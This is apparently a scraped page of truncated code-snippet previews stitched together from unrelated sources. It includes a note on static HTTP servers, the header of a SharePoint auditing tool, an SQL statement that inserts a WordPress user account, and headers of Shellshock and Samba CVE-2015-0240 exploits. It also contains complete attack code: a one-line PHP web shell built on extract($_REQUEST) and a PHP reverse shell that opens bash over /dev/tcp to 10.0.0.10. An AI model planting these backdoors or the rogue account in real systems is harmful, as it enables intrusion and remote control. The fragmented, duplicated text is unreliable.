Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
#!/usr/bin/env python2 | |
# coding: utf-8 | |
import os,socket,threading,time | |
#import traceback | |
allow_delete = False | |
local_ip = socket.gethostbyname(socket.gethostname()) | |
local_port = 8888 | |
currdir=os.path.abspath('.') |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
#!/usr/bin/python | |
# Sparty - Sharepoint/Frontend Auditor | |
# By: Aditya K Sood - SecNiche Security Labs ! (c) 2013 | |
license = """ | |
Copyright (c) 2013, {Aditya K sood} | |
All rights reserved. | |
Redistribution and use in source and binary forms, with or without modification, | |
are permitted provided that the following conditions are met: |
USE __DATABASE__; | |
SET @username = 'azizur'; | |
SET @password = MD5('password'); | |
SET @fullname = 'Azizur Rahman'; | |
SET @email = '[email protected]'; | |
SET @url = 'http://azizur.com/'; | |
INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) VALUES (@username, @password, @fullname, @email, @url, NOW(), '0', @fullname); |
#!/usr/bin/env python | |
import sys | |
if __name__ == "__main__": | |
if len(sys.argv) < 2: | |
print "usage: %s file.bin\n" % (sys.argv[0],) | |
sys.exit(0) | |
shellcode = "\"" | |
ctr = 1 | |
maxlen = 15 |
<?php extract($_REQUEST); @die($ctime($atime)); |
<?php | |
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
#!/bin/python | |
# Exploit Title: Shellshock SMTP Exploit | |
# Date: 10/3/2014 | |
# Exploit Author: fattymcwopr | |
# Vendor Homepage: gnu.org | |
# Software Link: http://ftp.gnu.org/gnu/bash/ | |
# Version: 4.2.x < 4.2.48 | |
# Tested on: Debian 7 (postfix smtp server w/procmail) | |
# CVE : 2014-6271 | |
by alexander white ©
#!/usr/bin/python | |
""" | |
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
in libtalloc does not write a value on 'creds' address. | |
Reference: | |
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |